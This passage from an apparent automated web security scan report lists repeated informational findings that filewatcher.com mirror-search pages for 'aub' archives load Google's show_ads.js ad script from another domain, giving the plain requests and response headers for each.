GET /m/aub-2.0.5.tgz.32475.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Pzqi5BoPu2SDkEkb7fcIug"
Content-Length: 17232
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 774
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1003. http://www.filewatcher.com/m/aub-2.0.5.tgz.32476.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32476.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32476.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "z11CQyjEcYH6sVxRd8t7Xw"
Content-Length: 19228
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1004. http://www.filewatcher.com/m/aub-2.0.5.tgz.32477.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32477.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32477.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8ffVe5Yw96HX+lrDpWFvgQ"
Content-Length: 19321
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1005. http://www.filewatcher.com/m/aub-2.0.5.tgz.32478.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32478.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32478.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eaWnWH2Unu2z9hlKe3WZsw"
Content-Length: 16294
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1006. http://www.filewatcher.com/m/aub-2.0.5.tgz.32479.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32479.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32479.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "l/qYQ9I11wIEKGo32Abp4g"
Content-Length: 19117
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1007. http://www.filewatcher.com/m/aub-2.0.5.tgz.32480.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32480.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32480.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wxDGX5Sir3nBJNAckUcH9g"
Content-Length: 17211
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1008. http://www.filewatcher.com/m/aub-2.0.5.tgz.32517.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32517.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32517.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vBDNbFbot6fUTE88pSE2xQ"
Content-Length: 19672
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 775
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1009. http://www.filewatcher.com/m/aub-2.0.5.tgz.32553.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32553.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32553.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MawCGbO7kVMZsu7w+c2URQ"
Content-Length: 15420
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1010. http://www.filewatcher.com/m/aub-2.1.3.tar.gz.55334.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.1.3.tar.gz.55334.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.1.3.tar.gz.55334.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+H2eqPipPt1yf+Xwx5R+nA"
Content-Length: 19018
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tar.gz - FTP Mirror Se
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1011. http://www.filewatcher.com/m/aub-2.1.3.tbz.20.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.1.3.tbz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.1.3.tbz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AuuYbjQrpUnv0gYJ0p9FCw"
Content-Length: 23865
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 764
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tbz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1012. http://www.filewatcher.com/m/aub-2.1.3.tgz.20.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.1.3.tgz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.1.3.tgz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gYAj054prPxdrHQLER8LJg"
Content-Length: 22326
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 775
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1013. http://www.filewatcher.com/m/aub-2.2.tbz.18.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.18.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.18.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "T7qAUOSRE7/RDOQCpYTNlw"
Content-Length: 22340
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 753
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1014. http://www.filewatcher.com/m/aub-2.2.tbz.41730.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41730.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41730.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5PNCNxzwi0EQiEUbt/eodA"
Content-Length: 17924
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1015. http://www.filewatcher.com/m/aub-2.2.tbz.41785.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41785.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41785.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iJC8yIq2RhLHrrZ6uruGUw"
Content-Length: 21684
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1016. http://www.filewatcher.com/m/aub-2.2.tbz.41791.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41791.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41791.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "2S6/P4vFN9ega0P3lla96w"
Content-Length: 21930
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1017. http://www.filewatcher.com/m/aub-2.2.tbz.41797.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41797.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41797.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4iUqtkr0Iuy6/P9kJIHrBA"
Content-Length: 21291
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1018. http://www.filewatcher.com/m/aub-2.2.tbz.41884.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41884.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41884.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "lNVlSzLrNdmnOcHY3W2c0g"
Content-Length: 21804
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1019. http://www.filewatcher.com/m/aub-2.2.tbz.41893.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41893.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41893.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "hNOtmbYv+l9rlBfJYdLByw"
Content-Length: 21780
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:32 GMT
